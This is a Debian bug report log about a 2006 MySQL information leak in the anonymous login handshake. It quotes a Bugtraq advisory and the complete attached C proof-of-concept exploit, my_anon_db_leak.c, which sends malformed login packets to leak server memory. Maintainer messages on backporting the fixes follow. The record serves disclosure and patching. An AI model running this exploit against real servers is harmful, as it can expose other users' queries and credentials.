Debian Bug report logs - #366044
SECURITY: MySQL Anonymous Login Handshake - Information Leakage

version graph

Package: mysql-server; Maintainer for mysql-server is Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>; Source for mysql-server is src:mysql-5.5.

Reported by: Christian Hammers <ch@debian.org>

Date: Wed, 3 May 2006 20:48:24 UTC

Severity: grave

Tags: security

Found in versions mysql-server/3.23.49-8.14, mysql-server/4.0.24-10sarge1

Fixed in versions mysql-server/4.0.24-10sarge2, mysql-server/3.23.49-8.15

Done: Filipus Klutiero <ido@vif.com>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org:
Bug#365938; Package mysql-server-5.0. Full text and rfc822 format available.

Acknowledgement sent to Christian Hammers <ch@debian.org>:
New Bug report received and forwarded. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Christian Hammers <ch@debian.org>
To: submit@bugs.debian.org
Subject: SECURITY: MySQL Anonymous Login Handshake - Information Leakage
Date: Wed, 3 May 2006 22:37:04 +0200
[Message part 1 (text/plain, inline)]
Package: mysql-server-5.0
Severity: grave
Justification: user security hole
Tags: security

Affected:
 3.23: unknown    \
 4.0: unknown      } probably DSA needed, I'll have a look
 4.1: yes         /
 5.0: yes, will be fixed by the upcoming 5.0.21 release

In short: By accessing the socket or port 3306 by handcrafted packets, small
parts of the memory can be leaked. Could be enough to sniff a password
though.

bye,

-christian-
[Message part 2 (message/rfc822, inline)]
206.231.27])
	by mail3b2.westend.com (Postfix) with ESMTP id 84D4C12128F
	for <ch@westend.com>; Tue,  2 May 2006 20:51:10 +0200 (CEST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
          via smtpd (for mail3a2.westend.com [212.117.79.67]) with ESMTP; T=
ue, 2 May 2006 11:24:59 -0700
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.=
231.20])
	by outgoing3.securityfocus.com (Postfix) with QMQP
	id C286A237011; Tue,  2 May 2006 09:25:10 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Received: (qmail 5226 invoked from network); 2 May 2006 13:30:09 -0000
Subject: [bugtraq] MySQL Anonymous Login Handshake -  Information Leakage.
From: Stefano Di Paola <stefano.dipaola@wisec.it>
To: Bugtraq <bugtraq@securityfocus.com>,
	vulnwatch <vulnwatch@vulnwatch.org>
Date: Tue, 02 May 2006 15:40:02 +0200
Message-Id: <1146577202.5679.216.camel@first>
X-Mailer: Evolution 2.0.1-1mdk=20
X-Spam-Rating: smtp2.aruba.it 1.6.2 0/1000/N
Resent-From: ch@westend.com
Resent-Date: Wed, 3 May 2006 09:58:45 +0200
Resent-To: ch@lathspell.de
Resent-Message-Id: <20060503075845.9E218BF87@mail3b1.westend.com>
X-Spam-Status: No, hits=3D-97.8 tagged_above=3D-999.0 required=3D5.0 tests=
=3DAWL,
	DCC_CHECK, DNS_FROM_RFC_POST, SPF_HELO_PASS, USER_IN_WHITELIST
X-Spam-Level:=20
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=3D"=3D-CAFKjGLMUFoYmJQtCHl1"


--=3D-CAFKjGLMUFoYmJQtCHl1
Content-Type: text/plain
Content-Transfer-Encoding: binary

~.oOOo. Anonymous Login Handshake .oOOo.~
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

MySQL Server (<=3D 4.1.18, 5.0.20 )  has an information=20
leakage in the way mysql parses login packets on anonymous=20
users (blank password).

Author: Stefano Di Paola
Vulnerable: Mysql <=3D   4.1.18, 5.0.20
Type of Vulnerability: Local/Remote - input validation - Information
Leakage
Tested On :  Debian 3.1 - IA32.
Vendor Status: Notified on April, 25th 2006, Confirmed on April, 26th
2006, New versions released on 2nd May 2006.
Fixed: Update to 4.0.27, 4.1.19, 5.0.21, 5.1.10 versions.

A Proof of Concept is Attached for this issue.
Tested on: Debian 3.1 - IA32.


A little Note:
To take advantage of these flaws an attacker should have direct access
to MySQL server communication layer (port 3306 or unix socket).
But if used in conjuction with some web application flaws=20
(i.e. php code injection) an attacker could use socket programming
(i.e. php sockets) to gain access to that layer.

-- Description

By crafting a specifically malformed login packet, initial db name is
filled with uninitialized memory content.


Let's suppose MySql Server has anonymous access.

Infact, if we want to use 'wisecdb' database as user 'wisec' and
password 's'  a normal client would send a packet like this:
---------------------------------------------------------------
43  00  00  01  0d  a6  03  00  00  00  00  01  08  00  00  00
00  00  00  00  00  00  00  00  00  00  00  00  00  00  00  00
00  00  00  00  77  69  73  65  63  00  14  aa  69  23  07  2a
ff  99  61  a3  c4  5f  04  66  3b  32  ef  a1  f2  b6  59  77
69  73  65  63  64  62  00
C   .   .   .   .   .   .   .   .   .   .   .   .   .   .   .
.   .   .   .   .   .   .   .   .   .   .   .   .   .   .   .
.   .   .   .   w   i   s   e   c   .   .   .   i   #   .   *
.   .   a   .   .   _   .   f   ;   2   .   .   .   .   Y   w
i   s   e   c   d   b   .
---------------------------------------------------------------

but if we look at the code (MySQL <=3D 5.0.20)
on sql_parse.cc line ~  993
        function  check_connection(THD *thd):
--     =20
  char *user=3D end;
  char *passwd=3D strend(user)+1;
  char *db=3D passwd;
  char db_buff[NAME_LEN+1];                     // buffer to store db in
utf8
  char user_buff[USERNAME_LENGTH+1];            // buffer to store user
in utf8
  uint dummy_errors;

  uint passwd_len=3D thd->client_capabilities & CLIENT_SECURE_CONNECTION ?
    *passwd++ : strlen(passwd);
  db=3D thd->client_capabilities & CLIENT_CONNECT_WITH_DB ?
    db + passwd_len + 1 : 0;
[1]
  /* Since 4.1 all database names are stored in utf8 */
  if (db)
  {
    db_buff[copy_and_convert(db_buff, sizeof(db_buff)-1,
                             system_charset_info,
                             db, strlen(db),
                             thd->charset(), &dummy_errors)]=3D 0;
    db=3D db_buff;
  }
       =20
--

It can be noticed a check for packet construction is missing here[1].

Just replace the null byte at the end of username=20
'wisec\0' with any other byte like this 'wisec0'.
What happens?

user is assigned to some part of the packet content, and db is assigned
with some (internal) memory beyond packet_length.

so if we send a specifical packet we'll get an error message like this:=20

Access denied for user ''@localhost to database 'lqt'

By changing packet lenght (db length) and with a little bit of luck a
malicious user could get sensitive informations such as parts of queries
and or response executed by some previously logged user.

-

The fix:

bugs are fixed in 4.0.27, 4.1.19, 5.0.21, 5.1.10.
You can download them on http://dev.mysql.com/downloads/


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

=3D=3DAnonymous packet information leakage poc :=20

my_anon_db_leak.c

  Compile with:
  gcc my_anon_db_leak.c -o my_anon_db_leak
 =20
  usage:
  my_anon_db_leak  [-s path/to/socket] [-h hostname_or_ip]
[-p port_num] [-n db_len]


Example=20
$ my_anon_db_leak -s /tmp/mysql.sock -n 20


Regards,

Stefano

--=20

......---oOOo--------oOOo---......
Stefano Di Paola
Software Engineer
Email: stefano.dipaola_at_wisec.it
Email: stefano.dipaola1_at_tin.it
Web: www.wisec.it
..................................

--=3D-CAFKjGLMUFoYmJQtCHl1
Content-Type: text/x-csrc; charset=3DISO-8859-15; name=3Dmy_anon_db_leak.c
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=3Dmy_anon_db_leak.c

/* ****************************************************************
 =20
  April 21.st 2006
 =20
  my_anon_db_leak.c

  MySql Anonimous Login Memory Leak=20
 =20
  MySql <=3D 5.0.20
 =20
  MySql <=3D 4.1.x
 =20
  copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it)
 =20
  GPL 2.0
  ****************************************************************
 =20
  Disclaimer:

  In no event shall the author be liable for any damages=20
  whatsoever arising out of or in connection with the use=20
  or spread of this information.=20
  Any use of this information is at the user's own risk.
 =20
  ****************************************************************
  Compile with:
  gcc my_anon_db_leak.c -o my_anon_db_leak
 =20
  usage:
  my_anon_db_leak [-s path/to/socket] [-h hostname_or_ip] [-p port_num] [-n=
 db_len]
 =20
 =20
*/


#include <sys/types.h>
/* we need MSG_WAITALL - that's why this ugly #ifdef, why doesn't glibc2
have MSG_WAITALL in its <socketbits.h> ??
*/

#ifdef __linux__
#include <linux/socket.h>
#else
#include <sys/socket.h>
#endif
#include <sys/socket.h>
#include <sys/un.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/file.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>		/* sockaddr_in{} and other Internet defns */
#include <netdb.h>		/* needed by gethostbyname */
#include <arpa/inet.h>		/* needed by inet_ntoa */


char anon_pckt[] =3D {
  0x3d, 0x00, 0x00, 0x01, 0x0d, 0xa6, 0x03, 0x00, 0x00, 0x00, 0x00, 0x01, 0=
x08, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0=
x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x14, 0x99, 0=
xdb, 0x54, 0xb6, 0x6a,
  0xd7, 0xc2, 0x86, 0x4c, 0x50, 0xa8, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0=
x0d, 0xad, 0x45, 0x73,
  0x00
};				// len=3D16*4+1=3D65;


int anon_pckt_len =3D 65;

#define USOCK "/tmp/mysql2.sock"

int
tcp_conn (char *hostname, int port)
{

  int sockfd;
  int n;
  struct sockaddr_in servaddr;

  struct hostent *hp;



  if ((hp =3D gethostbyname (hostname)) =3D=3D 0)
    {
      perror ("gethostbyname");
      exit (0);
    }

  if ((sockfd =3D socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("socket");
      exit (1);
    }

  bzero ((char *) &servaddr, sizeof (servaddr));
  servaddr.sin_family =3D AF_INET;
  servaddr.sin_port =3D htons (port);

  memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);
  if (servaddr.sin_addr.s_addr <=3D 0)
    {
      perror ("bad address after gethostbyname");
      exit (1);
    }
  if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < =
0)
    {
      perror ("connect");
      exit (1);
    }
  return sockfd;
}

int
unix_conn (char *path)
{
  int fd, len;
  struct sockaddr_un sa;

  fd =3D socket (PF_UNIX, SOCK_STREAM, 0);

  if (fd < 0)
    {
      perror ("cli: socket(PF_UNIX,SOCK_STREAM)");
      exit (1);
    }

  sa.sun_family =3D AF_UNIX;
  strcpy (sa.sun_path, path);
  len =3D sizeof (sa);
  if (connect (fd, (struct sockaddr *) &sa, len) < 0)
    {
      perror ("cli: connect()");
      exit (1);
    }
  return fd;
}

int
main (int argc, char *argv[])
{
  int fd;
  int i, ret;
  char packet[65535];
  char *path;
  char *host;
  int port =3D 3306;
  char buf[65535];
  int db_len =3D 0;
  int pckt_len =3D anon_pckt_len;
  int unix_sock =3D 1;
  char c;

  path =3D strdup (USOCK);
  host =3D strdup ("127.0.0.1");

  opterr =3D 0;

  while ((c =3D getopt (argc, argv, "s:h:p:n:")) !=3D -1)
    switch (c)
      {
      case 's':
	path =3D strdup (optarg);
	unix_sock =3D 1;
	break;
      case 'h':
	host =3D strdup (optarg);
	unix_sock =3D 0;
	break;
      case 'p':
	port =3D atoi (optarg);
	unix_sock =3D 0;
	break;
      case 'n':
	db_len =3D atoi (optarg);
	break;

      default:
	break;
      }


  bzero (packet, 65535);

  pckt_len =3D anon_pckt_len + db_len;
  printf ("%d\n", pckt_len);

  for (i =3D 0; i < pckt_len; i++)
    packet[i] =3D anon_pckt[i];

  if (db_len)
    for (i =3D anon_pckt_len - 2; i < pckt_len; i++)
      packet[i] =3D 'A';

  packet[pckt_len - 1] =3D '\0';

  packet[0] =3D (char) (anon_pckt[0] + db_len) & 0xff;
  packet[1] =3D (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;
  for (i =3D 0; i < pckt_len; i++)
    printf (" %.2x%c", (unsigned char) packet[i],
	    ((i + 1) % 16 ? ' ' : '\n'));
  printf ("\n");


  if (unix_sock)
    fd =3D unix_conn (path);
  else
    fd =3D tcp_conn (host, port);

  sleep (1);
  ret =3D recv (fd, buf, 65535, 0);
  if (send (fd, packet, pckt_len, 0) !=3D pckt_len)
    {
      perror ("cli: send(anon_pckt)");
      exit (1);
    }

  ret =3D recv (fd, buf, 65535, 0);
  for (i =3D 0; i < ret; i++)
    printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
  printf ("\n");
  return 0;
}

--=3D-CAFKjGLMUFoYmJQtCHl1--

Reply sent to Filipus Klutiero <ido@vif.com>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #10 received at 365938-done@bugs.debian.org (full text, mbox):

From: Filipus Klutiero <ido@vif.com>
To: 365938-done@bugs.debian.org
Subject: Fixed
Date: Thu, 04 May 2006 05:22:58 -0400
Version: 5.0.21-1

It seems that a typo in 5.0.21-1's changelog kept this bug from being 
automatically closed:

mysql-dfsg-5.0 (5.0.21-1) unstable; urgency=high
.
* SECURITY: New upstream release with some security relevant bugfixes:
* "Anonymous Login Handshake - Information Leakage"
* "COM_TABLE_DUMP Information Leakage and Arbitrary command execution"
Closes: #365939 
<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=365939>, #365939 
<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=365939>



Bug 365938 cloned as bugs 366043, 366044. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug reassigned from package `mysql-server-5.0' to `mysql-server'. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug marked as found in version 3.23.49-8.14. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug marked as found in version 4.0.24-10sarge1. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug reopened, originator not changed. Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org. Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#366044; Package mysql-server. Full text and rfc822 format available.

Acknowledgement sent to sean finney <seanius@debian.org>:
Extra info received and forwarded to list. Copy sent to Christian Hammers <ch@debian.org>. Full text and rfc822 format available.

Message #25 received at 366044@bugs.debian.org (full text, mbox):

From: sean finney <seanius@debian.org>
To: ch@debian.org
Cc: 366049@bugs.debian.org, 366044@bugs.debian.org, 366163@bugs.debian.org
Subject: mysql woody/3.23 done
Date: Sun, 7 May 2006 07:43:48 -0400
[Message part 1 (text/plain, inline)]
hey christian,

just fyi to keep things fully documented, i've backported the relevant
patches for all 4 CVE's to the woody/3.23 version of mysql.

i've been able to verify that the vulnerabilities exist, and are
exploitable by modifying the posted PoC code from the OP.  i've
also been able to verify that the patch fixes the problem
in the way it's supposed to.

everything is available at:

	http://people.debian.org/~seanius/mysql/woody/

including the following files:

- CVE-2006-0903.pl: basic perl based exploit.
- CVE-2006-1516_mysql-3.23.c: modified version of OP's PoC.
- CVE-2006-1517.c: modified version of OP's PoC.

and of course:

- mysql_3.23.49-8.15.diff.gz
- mysql_3.23.49-8.15.dsc   

i'll see about hacking on the sarge versions tonight.

	sean

-- 
[signature.asc (application/pgp-signature, inline)]

Bug marked as not found in version 3.23.49-8.15. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Reply sent to Filipus Klutiero <ido@vif.com>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Christian Hammers <ch@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #32 received at 366044-done@bugs.debian.org (full text, mbox):

From: Filipus Klutiero <ido@vif.com>
To: 366044-done@bugs.debian.org
Subject: Fixed
Date: Mon, 29 May 2006 09:01:49 -0400
close 366044 4.0.24-10sarge2
close 366044 3.23.49-8.15



Information forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#366044; Package mysql-server. Full text and rfc822 format available.

Acknowledgement sent to Filipus Klutiero <ido@vif.com>:
Extra info received and forwarded to list. Copy sent to Christian Hammers <ch@debian.org>. Full text and rfc822 format available.

Message #37 received at 366044@bugs.debian.org (full text, mbox):

From: Filipus Klutiero <ido@vif.com>
To: control@bugs.debian.org
Cc: 366044@bugs.debian.org
Subject: Fixed
Date: Mon, 29 May 2006 09:02:51 -0400
close 366044 4.0.24-10sarge2
close 366044 3.23.49-8.15
thanks

Doh for previous message.



Bug marked as fixed in version 4.0.24-10sarge2, send any further explanations to Christian Hammers <ch@debian.org> Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org. Full text and rfc822 format available.

Bug marked as fixed in version 3.23.49-8.15, send any further explanations to Christian Hammers <ch@debian.org> Request was from Filipus Klutiero <ido@vif.com> to control@bugs.debian.org. Full text and rfc822 format available.

Bug marked as not found in version 3.23.49-8.15. Request was from Christian Hammers <ch@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 25 Jun 2007 10:25:13 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 17:08:35 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.